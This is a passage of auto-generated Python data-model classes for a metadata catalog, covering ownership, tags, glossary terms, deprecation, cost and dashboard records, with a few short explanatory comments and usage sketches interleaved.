"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
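When `created` or `lastModified` is omitted, the constructors above materialize the Avro field default (`{'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}`) via `_json_converter.from_json_object`. A hypothetical, self-contained sketch of that fallback behavior (the real classes read the default out of `RECORD_SCHEMA.field_map`):

```python
# Sketch of the default-fallback behavior in ChangeAuditStampsClass.__init__:
# omitted audit stamps fall back to the schema default (unknown actor, time 0),
# while `deleted` stays None unless explicitly provided.
from typing import Optional

_AUDIT_STAMP_DEFAULT = {"actor": "urn:li:corpuser:unknown", "impersonator": None, "time": 0}


def make_change_audit_stamps(created: Optional[dict] = None,
                             lastModified: Optional[dict] = None,
                             deleted: Optional[dict] = None) -> dict:
    return {
        "created": dict(_AUDIT_STAMP_DEFAULT) if created is None else created,
        "lastModified": dict(_AUDIT_STAMP_DEFAULT) if lastModified is None else lastModified,
        "deleted": deleted,
    }


stamps = make_change_audit_stamps()
```

As the docstrings note, a `time` of 0 in the resulting default stamp signals missing data rather than a real timestamp.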
class CostClass(DictWrapper):
# No docs available.
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.Cost")
def __init__(self,
costType: Union[str, "CostTypeClass"],
cost: "CostCostClass",
):
super().__init__()
self.costType = costType
self.cost = cost
@classmethod
def construct_with_defaults(cls) -> "CostClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.costType = CostTypeClass.ORG_COST_TYPE
self.cost = CostCostClass.construct_with_defaults()
@property
def costType(self) -> Union[str, "CostTypeClass"]:
# No docs available.
return self._inner_dict.get('costType') # type: ignore
@costType.setter
def costType(self, value: Union[str, "CostTypeClass"]) -> None:
# No docs available.
self._inner_dict['costType'] = value
@property
def cost(self) -> "CostCostClass":
# No docs available.
return self._inner_dict.get('cost') # type: ignore
@cost.setter
def cost(self, value: "CostCostClass") -> None:
# No docs available.
self._inner_dict['cost'] = value
class CostCostClass(DictWrapper):
# No docs available.
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.CostCost")
def __init__(self,
fieldDiscriminator: Union[str, "CostCostDiscriminatorClass"],
costId: Union[None, float]=None,
costCode: Union[None, str]=None,
):
super().__init__()
self.costId = costId
self.costCode = costCode
self.fieldDiscriminator = fieldDiscriminator
@classmethod
def construct_with_defaults(cls) -> "CostCostClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.costId = self.RECORD_SCHEMA.field_map["costId"].default
self.costCode = self.RECORD_SCHEMA.field_map["costCode"].default
self.fieldDiscriminator = CostCostDiscriminatorClass.costId
@property
def costId(self) -> Union[None, float]:
# No docs available.
return self._inner_dict.get('costId') # type: ignore
@costId.setter
def costId(self, value: Union[None, float]) -> None:
# No docs available.
self._inner_dict['costId'] = value
@property
def costCode(self) -> Union[None, str]:
# No docs available.
return self._inner_dict.get('costCode') # type: ignore
@costCode.setter
def costCode(self, value: Union[None, str]) -> None:
# No docs available.
self._inner_dict['costCode'] = value
@property
def fieldDiscriminator(self) -> Union[str, "CostCostDiscriminatorClass"]:
"""Getter: Contains the name of the field that has its value set."""
return self._inner_dict.get('fieldDiscriminator') # type: ignore
@fieldDiscriminator.setter
def fieldDiscriminator(self, value: Union[str, "CostCostDiscriminatorClass"]) -> None:
"""Setter: Contains the name of the field that has its value set."""
self._inner_dict['fieldDiscriminator'] = value
class CostCostDiscriminatorClass(object):
# No docs available.
costId = "costId"
costCode = "costCode"
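`CostCostClass` is a discriminated union: exactly one of `costId`/`costCode` is expected to carry a value, and `fieldDiscriminator` names which one. A hypothetical helper sketching that usage (not part of the generated module, which does not enforce the invariant itself):

```python
# Sketch of how the CostCost discriminated union is meant to be populated:
# set exactly one of costId/costCode, and record its name in fieldDiscriminator.
from typing import Optional


def make_cost_cost(costId: Optional[float] = None,
                   costCode: Optional[str] = None) -> dict:
    if (costId is None) == (costCode is None):
        raise ValueError("exactly one of costId/costCode must be set")
    discriminator = "costId" if costId is not None else "costCode"
    return {"costId": costId, "costCode": costCode,
            "fieldDiscriminator": discriminator}


by_id = make_cost_cost(costId=42.0)
by_code = make_cost_cost(costCode="CC-123")
```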
class CostTypeClass(object):
"""Type of Cost Code"""
"""Org Cost Type to which the Cost of this entity should be attributed to"""
ORG_COST_TYPE = "ORG_COST_TYPE"
class DeprecationClass(DictWrapper):
"""Deprecation status of an entity"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.Deprecation")
def __init__(self,
deprecated: bool,
note: str,
actor: str,
decommissionTime: Union[None, int]=None,
):
super().__init__()
self.deprecated = deprecated
self.decommissionTime = decommissionTime
self.note = note
self.actor = actor
@classmethod
def construct_with_defaults(cls) -> "DeprecationClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.deprecated = bool()
self.decommissionTime = self.RECORD_SCHEMA.field_map["decommissionTime"].default
self.note = str()
self.actor = str()
@property
def deprecated(self) -> bool:
"""Getter: Whether the entity is deprecated."""
return self._inner_dict.get('deprecated') # type: ignore
@deprecated.setter
def deprecated(self, value: bool) -> None:
"""Setter: Whether the entity is deprecated."""
self._inner_dict['deprecated'] = value
@property
def decommissionTime(self) -> Union[None, int]:
"""Getter: The time at which the user plans to decommission this entity."""
return self._inner_dict.get('decommissionTime') # type: ignore
@decommissionTime.setter
def decommissionTime(self, value: Union[None, int]) -> None:
"""Setter: The time at which the user plans to decommission this entity."""
self._inner_dict['decommissionTime'] = value
@property
def note(self) -> str:
"""Getter: Additional information about the entity deprecation plan, such as the wiki, doc, RB."""
return self._inner_dict.get('note') # type: ignore
@note.setter
def note(self, value: str) -> None:
"""Setter: Additional information about the entity deprecation plan, such as the wiki, doc, RB."""
self._inner_dict['note'] = value
@property
def actor(self) -> str:
"""Getter: The corpuser URN which will be credited for modifying this deprecation content."""
return self._inner_dict.get('actor') # type: ignore
@actor.setter
def actor(self, value: str) -> None:
"""Setter: The corpuser URN which will be credited for modifying this deprecation content."""
self._inner_dict['actor'] = value
class FabricTypeClass(object):
"""Fabric group type"""
"""Designates development fabrics"""
DEV = "DEV"
"""Designates early-integration (staging) fabrics"""
EI = "EI"
"""Designates production fabrics"""
PROD = "PROD"
"""Designates corporation fabrics"""
CORP = "CORP"
class GlobalTagsClass(DictWrapper):
"""Tag aspect used for applying tags to an entity"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.GlobalTags")
def __init__(self,
tags: List["TagAssociationClass"],
):
super().__init__()
self.tags = tags
@classmethod
def construct_with_defaults(cls) -> "GlobalTagsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.tags = list()
@property
def tags(self) -> List["TagAssociationClass"]:
"""Getter: Tags associated with a given entity"""
return self._inner_dict.get('tags') # type: ignore
@tags.setter
def tags(self, value: List["TagAssociationClass"]) -> None:
"""Setter: Tags associated with a given entity"""
self._inner_dict['tags'] = value
class GlossaryTermAssociationClass(DictWrapper):
"""Properties of an applied glossary term."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.GlossaryTermAssociation")
def __init__(self,
urn: str,
):
super().__init__()
self.urn = urn
@classmethod
def construct_with_defaults(cls) -> "GlossaryTermAssociationClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
@property
def urn(self) -> str:
"""Getter: Urn of the applied glossary term"""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: Urn of the applied glossary term"""
self._inner_dict['urn'] = value
class GlossaryTermsClass(DictWrapper):
"""Related business terms information"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.GlossaryTerms")
def __init__(self,
terms: List["GlossaryTermAssociationClass"],
auditStamp: "AuditStampClass",
):
super().__init__()
self.terms = terms
self.auditStamp = auditStamp
@classmethod
def construct_with_defaults(cls) -> "GlossaryTermsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.terms = list()
self.auditStamp = AuditStampClass.construct_with_defaults()
@property
def terms(self) -> List["GlossaryTermAssociationClass"]:
"""Getter: The related business terms"""
return self._inner_dict.get('terms') # type: ignore
@terms.setter
def terms(self, value: List["GlossaryTermAssociationClass"]) -> None:
"""Setter: The related business terms"""
self._inner_dict['terms'] = value
@property
def auditStamp(self) -> "AuditStampClass":
"""Getter: Audit stamp containing who reported the related business term"""
return self._inner_dict.get('auditStamp') # type: ignore
@auditStamp.setter
def auditStamp(self, value: "AuditStampClass") -> None:
"""Setter: Audit stamp containing who reported the related business term"""
self._inner_dict['auditStamp'] = value
class InstitutionalMemoryClass(DictWrapper):
"""Institutional memory of an entity. This is a way to link to relevant documentation and provide description of the documentation. Institutional or tribal knowledge is very important for users to leverage the entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.InstitutionalMemory")
def __init__(self,
elements: List["InstitutionalMemoryMetadataClass"],
):
super().__init__()
self.elements = elements
@classmethod
def construct_with_defaults(cls) -> "InstitutionalMemoryClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.elements = list()
@property
def elements(self) -> List["InstitutionalMemoryMetadataClass"]:
"""Getter: List of records that represent institutional memory of an entity. Each record consists of a link, description, creator and timestamps associated with that record."""
return self._inner_dict.get('elements') # type: ignore
@elements.setter
def elements(self, value: List["InstitutionalMemoryMetadataClass"]) -> None:
"""Setter: List of records that represent institutional memory of an entity. Each record consists of a link, description, creator and timestamps associated with that record."""
self._inner_dict['elements'] = value
class InstitutionalMemoryMetadataClass(DictWrapper):
"""Metadata corresponding to a record of institutional memory."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.InstitutionalMemoryMetadata")
def __init__(self,
url: str,
description: str,
createStamp: "AuditStampClass",
):
super().__init__()
self.url = url
self.description = description
self.createStamp = createStamp
@classmethod
def construct_with_defaults(cls) -> "InstitutionalMemoryMetadataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.url = str()
self.description = str()
self.createStamp = AuditStampClass.construct_with_defaults()
@property
def url(self) -> str:
"""Getter: Link to an engineering design document or a wiki page."""
return self._inner_dict.get('url') # type: ignore
@url.setter
def url(self, value: str) -> None:
"""Setter: Link to an engineering design document or a wiki page."""
self._inner_dict['url'] = value
@property
def description(self) -> str:
"""Getter: Description of the link."""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: str) -> None:
"""Setter: Description of the link."""
self._inner_dict['description'] = value
@property
def createStamp(self) -> "AuditStampClass":
"""Getter: Audit stamp associated with creation of this record"""
return self._inner_dict.get('createStamp') # type: ignore
@createStamp.setter
def createStamp(self, value: "AuditStampClass") -> None:
"""Setter: Audit stamp associated with creation of this record"""
self._inner_dict['createStamp'] = value
class MLFeatureDataTypeClass(object):
"""MLFeature Data Type"""
"""Useless data is unique, discrete data with no potential relationship with the outcome variable.
A useless feature has high cardinality. An example would be bank account numbers that were generated randomly."""
USELESS = "USELESS"
"""Nominal data is made of discrete values with no numerical relationship between the different categories — mean and median are meaningless.
Animal species is one example. For example, pig is not higher than bird and lower than fish."""
NOMINAL = "NOMINAL"
"""Ordinal data are discrete integers that can be ranked or sorted.
For example, the distance between first and second may not be the same as the distance between second and third."""
ORDINAL = "ORDINAL"
"""Binary data is discrete data that can be in only one of two categories — either yes or no, 1 or 0, off or on, etc"""
BINARY = "BINARY"
"""Count data is discrete whole number data — no negative numbers here.
Count data often has many small values, such as zero and one."""
COUNT = "COUNT"
"""Time data is a cyclical, repeating continuous form of data.
The relevant time features can be any period: daily, weekly, monthly, annual, etc."""
TIME = "TIME"
"""Interval data has equal spaces between the numbers and does not represent a temporal pattern.
Examples include percentages, temperatures, and income."""
INTERVAL = "INTERVAL"
"""Image Data"""
IMAGE = "IMAGE"
"""Video Data"""
VIDEO = "VIDEO"
"""Audio Data"""
AUDIO = "AUDIO"
"""Text Data"""
TEXT = "TEXT"
"""Mapping Data Type ex: dict, map"""
MAP = "MAP"
"""Sequence Data Type ex: list, tuple, range"""
SEQUENCE = "SEQUENCE"
"""Set Data Type ex: set, frozenset"""
SET = "SET"
"""Continuous data are made of uncountable values, often the result of a measurement such as height, weight, age etc."""
CONTINUOUS = "CONTINUOUS"
"""Bytes data are binary-encoded values that can represent complex objects."""
BYTE = "BYTE"
"""Unknown data are data that we don't know the type for."""
UNKNOWN = "UNKNOWN"
class OwnerClass(DictWrapper):
"""Ownership information"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.Owner")
def __init__(self,
owner: str,
type: Union[str, "OwnershipTypeClass"],
source: Union[None, "OwnershipSourceClass"]=None,
):
super().__init__()
self.owner = owner
self.type = type
self.source = source
@classmethod
def construct_with_defaults(cls) -> "OwnerClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.owner = str()
self.type = OwnershipTypeClass.DEVELOPER
self.source = self.RECORD_SCHEMA.field_map["source"].default
@property
def owner(self) -> str:
"""Getter: Owner URN, e.g. urn:li:corpuser:ldap, urn:li:corpGroup:group_name, and urn:li:multiProduct:mp_name
(Caveat: only corpuser is currently supported in the frontend.)"""
return self._inner_dict.get('owner') # type: ignore
@owner.setter
def owner(self, value: str) -> None:
"""Setter: Owner URN, e.g. urn:li:corpuser:ldap, urn:li:corpGroup:group_name, and urn:li:multiProduct:mp_name
(Caveat: only corpuser is currently supported in the frontend.)"""
self._inner_dict['owner'] = value
@property
def type(self) -> Union[str, "OwnershipTypeClass"]:
"""Getter: The type of the ownership"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "OwnershipTypeClass"]) -> None:
"""Setter: The type of the ownership"""
self._inner_dict['type'] = value
@property
def source(self) -> Union[None, "OwnershipSourceClass"]:
"""Getter: Source information for the ownership"""
return self._inner_dict.get('source') # type: ignore
@source.setter
def source(self, value: Union[None, "OwnershipSourceClass"]) -> None:
"""Setter: Source information for the ownership"""
self._inner_dict['source'] = value
class OwnershipClass(DictWrapper):
"""Ownership information of an entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.Ownership")
def __init__(self,
owners: List["OwnerClass"],
lastModified: Optional["AuditStampClass"]=None,
):
super().__init__()
self.owners = owners
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
@classmethod
def construct_with_defaults(cls) -> "OwnershipClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.owners = list()
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
@property
def owners(self) -> List["OwnerClass"]:
"""Getter: List of owners of the entity."""
return self._inner_dict.get('owners') # type: ignore
@owners.setter
def owners(self, value: List["OwnerClass"]) -> None:
"""Setter: List of owners of the entity."""
self._inner_dict['owners'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: Audit stamp containing who last modified the record and when. A value of 0 in the time field indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: Audit stamp containing who last modified the record and when. A value of 0 in the time field indicates missing data."""
self._inner_dict['lastModified'] = value
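Once serialized, an Ownership aspect is a nested payload: a list of owner records (each with `owner`, `type`, and optional `source`) plus an audit stamp that defaults to the unknown corpuser at time 0. A hypothetical dict-level sketch of that shape (illustrative values only):

```python
# Sketch of the nested payload an Ownership aspect carries: one record per
# owner URN, plus the default lastModified audit stamp.
from typing import List


def make_ownership(owner_urns: List[str], owner_type: str = "DATAOWNER") -> dict:
    return {
        "owners": [{"owner": urn, "type": owner_type, "source": None}
                   for urn in owner_urns],
        "lastModified": {"actor": "urn:li:corpuser:unknown",
                         "impersonator": None, "time": 0},
    }


ownership = make_ownership(["urn:li:corpuser:alice", "urn:li:corpuser:bob"])
```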
class OwnershipSourceClass(DictWrapper):
"""Source/provider of the ownership information"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.OwnershipSource")
def __init__(self,
type: Union[str, "OwnershipSourceTypeClass"],
url: Union[None, str]=None,
):
super().__init__()
self.type = type
self.url = url
@classmethod
def construct_with_defaults(cls) -> "OwnershipSourceClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.type = OwnershipSourceTypeClass.AUDIT
self.url = self.RECORD_SCHEMA.field_map["url"].default
@property
def type(self) -> Union[str, "OwnershipSourceTypeClass"]:
"""Getter: The type of the source"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "OwnershipSourceTypeClass"]) -> None:
"""Setter: The type of the source"""
self._inner_dict['type'] = value
@property
def url(self) -> Union[None, str]:
"""Getter: A reference URL for the source"""
return self._inner_dict.get('url') # type: ignore
@url.setter
def url(self, value: Union[None, str]) -> None:
"""Setter: A reference URL for the source"""
self._inner_dict['url'] = value
class OwnershipSourceTypeClass(object):
# No docs available.
"""Auditing system or audit logs"""
AUDIT = "AUDIT"
"""Database, e.g. GRANTS table"""
DATABASE = "DATABASE"
"""File system, e.g. file/directory owner"""
FILE_SYSTEM = "FILE_SYSTEM"
"""Issue tracking system, e.g. Jira"""
ISSUE_TRACKING_SYSTEM = "ISSUE_TRACKING_SYSTEM"
"""Manually provided by a user"""
MANUAL = "MANUAL"
"""Other ownership-like service, e.g. Nuage, ACL service, etc."""
SERVICE = "SERVICE"
"""SCM system, e.g. GIT, SVN"""
SOURCE_CONTROL = "SOURCE_CONTROL"
"""Other sources"""
OTHER = "OTHER"
class OwnershipTypeClass(object):
"""Owner category or owner role"""
"""A person or group that is in charge of developing the code"""
DEVELOPER = "DEVELOPER"
"""A person or group that owns the data"""
DATAOWNER = "DATAOWNER"
"""A person or a group that oversees the operation, e.g. a DBA or SRE."""
DELEGATE = "DELEGATE"
"""A person, group, or service that produces/generates the data"""
PRODUCER = "PRODUCER"
"""A person, group, or service that consumes the data"""
CONSUMER = "CONSUMER"
"""A person or a group that has direct business interest"""
STAKEHOLDER = "STAKEHOLDER"
class StatusClass(DictWrapper):
"""The status metadata of an entity, e.g. dataset, metric, feature, etc."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.Status")
def __init__(self,
removed: Optional[bool]=None,
):
super().__init__()
if removed is None:
# default: False
self.removed = self.RECORD_SCHEMA.field_map["removed"].default
else:
self.removed = removed
@classmethod
def construct_with_defaults(cls) -> "StatusClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.removed = self.RECORD_SCHEMA.field_map["removed"].default
@property
def removed(self) -> bool:
"""Getter: whether the entity is removed or not"""
return self._inner_dict.get('removed') # type: ignore
@removed.setter
def removed(self, value: bool) -> None:
"""Setter: whether the entity is removed or not"""
self._inner_dict['removed'] = value
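Every generated class repeats the same `construct_with_defaults` pattern: build an instance without running `__init__` (via `cls.construct({})`), then have `_restore_defaults` fill in each field's schema default. A hypothetical miniature mirroring `StatusClass`, whose only field defaults to `False`:

```python
# Sketch of the construct_with_defaults pattern: skip __init__, then let
# _restore_defaults populate schema defaults (here, removed=False).
class StatusSketch:
    _REMOVED_DEFAULT = False  # stands in for RECORD_SCHEMA.field_map["removed"].default

    def __init__(self, removed=None):
        self.removed = self._REMOVED_DEFAULT if removed is None else removed

    @classmethod
    def construct_with_defaults(cls) -> "StatusSketch":
        self = cls.__new__(cls)   # bypass __init__, like cls.construct({})
        self._restore_defaults()
        return self

    def _restore_defaults(self) -> None:
        self.removed = self._REMOVED_DEFAULT


status = StatusSketch.construct_with_defaults()
```

Separating default restoration into `_restore_defaults` lets deserialization code reset an instance to a known baseline before overlaying decoded values.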
class TagAssociationClass(DictWrapper):
"""Properties of an applied tag. For now, just an Urn. In the future we can extend this with other properties, e.g.
propagation parameters."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.TagAssociation")
def __init__(self,
tag: str,
):
super().__init__()
self.tag = tag
@classmethod
def construct_with_defaults(cls) -> "TagAssociationClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.tag = str()
@property
def tag(self) -> str:
"""Getter: Urn of the applied tag"""
return self._inner_dict.get('tag') # type: ignore
@tag.setter
def tag(self, value: str) -> None:
"""Setter: Urn of the applied tag"""
self._inner_dict['tag'] = value
class VersionTagClass(DictWrapper):
"""A resource-defined string representing the resource state for the purpose of concurrency control"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.VersionTag")
def __init__(self,
versionTag: Union[None, str]=None,
):
super().__init__()
self.versionTag = versionTag
@classmethod
def construct_with_defaults(cls) -> "VersionTagClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.versionTag = self.RECORD_SCHEMA.field_map["versionTag"].default
@property
def versionTag(self) -> Union[None, str]:
# No docs available.
return self._inner_dict.get('versionTag') # type: ignore
@versionTag.setter
def versionTag(self, value: Union[None, str]) -> None:
# No docs available.
self._inner_dict['versionTag'] = value
class WindowDurationClass(object):
"""Enum to define the length of a bucket when doing aggregations"""
YEAR = "YEAR"
MONTH = "MONTH"
WEEK = "WEEK"
DAY = "DAY"
HOUR = "HOUR"
class TransformationTypeClass(object):
"""Type of the transformation involved in generating destination fields from source fields."""
"""Field transformation expressed as unknown black box function."""
BLACKBOX = "BLACKBOX"
"""Field transformation expressed as Identity function."""
IDENTITY = "IDENTITY"
class UDFTransformerClass(DictWrapper):
"""Field transformation expressed in UDF"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.fieldtransformer.UDFTransformer")
def __init__(self,
udf: str,
):
super().__init__()
self.udf = udf
@classmethod
def construct_with_defaults(cls) -> "UDFTransformerClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.udf = str()
@property
def udf(self) -> str:
"""Getter: A UDF mentioning how the source fields got transformed to destination field. This is the FQCN(Fully Qualified Class Name) of the udf."""
return self._inner_dict.get('udf') # type: ignore
@udf.setter
def udf(self, value: str) -> None:
"""Setter: A UDF mentioning how the source fields got transformed to destination field. This is the FQCN(Fully Qualified Class Name) of the udf."""
self._inner_dict['udf'] = value
class DashboardInfoClass(DictWrapper):
"""Information about a dashboard"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dashboard.DashboardInfo")
def __init__(self,
title: str,
description: str,
lastModified: "ChangeAuditStampsClass",
customProperties: Optional[Dict[str, str]]=None,
externalUrl: Union[None, str]=None,
charts: Optional[List[str]]=None,
dashboardUrl: Union[None, str]=None,
access: Union[None, Union[str, "AccessLevelClass"]]=None,
lastRefreshed: Union[None, int]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.externalUrl = externalUrl
self.title = title
self.description = description
if charts is None:
# default: []
self.charts = list()
else:
self.charts = charts
self.lastModified = lastModified
self.dashboardUrl = dashboardUrl
self.access = access
self.lastRefreshed = lastRefreshed
@classmethod
def construct_with_defaults(cls) -> "DashboardInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.externalUrl = self.RECORD_SCHEMA.field_map["externalUrl"].default
self.title = str()
self.description = str()
self.charts = list()
self.lastModified = ChangeAuditStampsClass.construct_with_defaults()
self.dashboardUrl = self.RECORD_SCHEMA.field_map["dashboardUrl"].default
self.access = self.RECORD_SCHEMA.field_map["access"].default
self.lastRefreshed = self.RECORD_SCHEMA.field_map["lastRefreshed"].default
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def externalUrl(self) -> Union[None, str]:
"""Getter: URL where the reference exist"""
return self._inner_dict.get('externalUrl') # type: ignore
@externalUrl.setter
def externalUrl(self, value: Union[None, str]) -> None:
"""Setter: URL where the reference exist"""
self._inner_dict['externalUrl'] = value
@property
def title(self) -> str:
"""Getter: Title of the dashboard"""
return self._inner_dict.get('title') # type: ignore
@title.setter
def title(self, value: str) -> None:
"""Setter: Title of the dashboard"""
self._inner_dict['title'] = value
@property
def description(self) -> str:
"""Getter: Detailed description about the dashboard"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: str) -> None:
"""Setter: Detailed description about the dashboard"""
self._inner_dict['description'] = value
@property
def charts(self) -> List[str]:
"""Getter: Charts in a dashboard"""
return self._inner_dict.get('charts') # type: ignore
@charts.setter
def charts(self, value: List[str]) -> None:
"""Setter: Charts in a dashboard"""
self._inner_dict['charts'] = value
@property
def lastModified(self) -> "ChangeAuditStampsClass":
"""Getter: Captures information about who created/last modified/deleted this dashboard and when"""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "ChangeAuditStampsClass") -> None:
"""Setter: Captures information about who created/last modified/deleted this dashboard and when"""
self._inner_dict['lastModified'] = value
@property
def dashboardUrl(self) -> Union[None, str]:
"""Getter: URL for the dashboard. This could be used as an external link on DataHub to allow users access/view the dashboard"""
return self._inner_dict.get('dashboardUrl') # type: ignore
@dashboardUrl.setter
def dashboardUrl(self, value: Union[None, str]) -> None:
"""Setter: URL for the dashboard. This could be used as an external link on DataHub to allow users access/view the dashboard"""
self._inner_dict['dashboardUrl'] = value
@property
def access(self) -> Union[None, Union[str, "AccessLevelClass"]]:
"""Getter: Access level for the dashboard"""
return self._inner_dict.get('access') # type: ignore
@access.setter
def access(self, value: Union[None, Union[str, "AccessLevelClass"]]) -> None:
"""Setter: Access level for the dashboard"""
self._inner_dict['access'] = value
@property
def lastRefreshed(self) -> Union[None, int]:
"""Getter: The time when this dashboard last refreshed"""
return self._inner_dict.get('lastRefreshed') # type: ignore
@lastRefreshed.setter
def lastRefreshed(self, value: Union[None, int]) -> None:
"""Setter: The time when this dashboard last refreshed"""
self._inner_dict['lastRefreshed'] = value
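# Illustrative usage only (not part of the generated schema): a minimal
# DashboardInfoClass, assuming a hypothetical chart urn and default audit stamps.
#
#   info = DashboardInfoClass(
#       title="Revenue Overview",
#       description="Daily revenue KPIs",
#       lastModified=ChangeAuditStampsClass.construct_with_defaults(),
#       charts=["urn:li:chart:(looker,revenue_by_region)"],
#   )
#   info.access = AccessLevelClass.PUBLIC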
class EditableDashboardPropertiesClass(DictWrapper):
"""Stores editable changes made to properties. This separates changes made from
ingestion pipelines and edits in the UI to avoid accidental overwrites of user-provided data by ingestion pipelines"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dashboard.EditableDashboardProperties")
def __init__(self,
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
description: Union[None, str]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.description = description
@classmethod
def construct_with_defaults(cls) -> "EditableDashboardPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
